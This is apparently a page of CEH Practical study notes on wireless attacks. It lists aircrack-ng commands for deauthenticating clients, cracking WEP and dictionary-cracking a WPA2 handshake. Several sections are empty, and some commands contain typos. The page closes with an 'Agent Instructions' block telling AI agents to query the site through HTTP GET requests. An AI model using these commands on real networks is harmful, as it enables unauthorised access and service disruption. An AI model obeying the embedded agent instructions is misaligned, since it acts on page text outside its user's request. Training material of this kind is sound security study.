# 3. Perform  Wireless Attacks

{% embed url="<https://rumble.com/embed/v6nqikc/?pub=4jw86f>" %}

## <mark style="color:red;">1. Crack WEP using Aircrack-ng</mark>

```
airmon-ng start wlan0
airodump-ng
airodump-ng –w "filename" -c "channel name"
aireplay-ng -1 0 -a (bssid) -h (mac of your card) -e (essid) (interface)
aireplay-ng -3 –b "bssid" -h "mac address"
aireplay-ng --deauth 3 -a MAC_AP -c MAC_Client mon0
aircrack-ng -b "filename.cap"
```

## <mark style="color:red;">2. Crack WEP using WifiPhisher</mark>

{% embed url="<https://github.com/wifiphisher/wifiphisher>" %}

## <mark style="color:red;">3. Crack WPA with FERN cracker</mark>

## 4. Crack WPA 2 with Aircrack

WPA2 is an upgrade to WPA; it includes mandatory support for Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP), an AES-based encryption protocol with strong security. WPA2 has two modes of operation: WPA2-Personal and WPA2-Enterprise. Despite being stronger than both WEP and WPA, the WPA2 encryption method can also be cracked using various techniques and tools.

In this task, we will use the Aircrack-ng suite to crack a WPA2 network.

```
aircrack-ng -a2 -b [Target BSSID] -w /home/attacker/Desktop/Wordlist/password.txt '/home/attacker/Desktop/Sample Captures/WPA2crack-01.cap
```

* **-a** is the technique used to crack the handshake, **2**=WPA technique.
* **-b** refers to bssid; replace with the BSSID of the target router.
* **-w** stands for wordlist; provide the path to a wordlist.

<figure><img src="/files/QdnrOK0mrBwUfaq644Xh" alt=""><figcaption></figcaption></figure>

The result appears, showing the WPA handshake packet captured with airodump-ng. The target access point’s password is cracked and displayed in plain text next to the message **KEY FOUND!**, as shown in the screenshot.

<figure><img src="/files/Y9E5FqCZ3NflVROItLcE" alt=""><figcaption></figcaption></figure>

{% embed url="<https://hackingplayground.blogspot.com/2022/07/hacking-wifi-networks-with-aircrack.html>" %}
Full tutorial
{% endembed %}

You can also use other tools such as **hashcat** (<https://hashcat.net>), **Portable Penetrator** (<https://www.secpoint.com>), **WepCrackGui** (<https://sourceforge.net>) to crack WEP/WPA/WPA2 encryption.

## <mark style="color:red;">5. Create a Rogue access Point</mark>

{% embed url="<https://www.udemy.com/course/ethical-hacker-practical/?referralCode=289CF01CF51246BCAD6C>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ceh-practical.cavementech.com/module-16.-hacking-wireless-networks/3.-perform-wireless-attacks.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.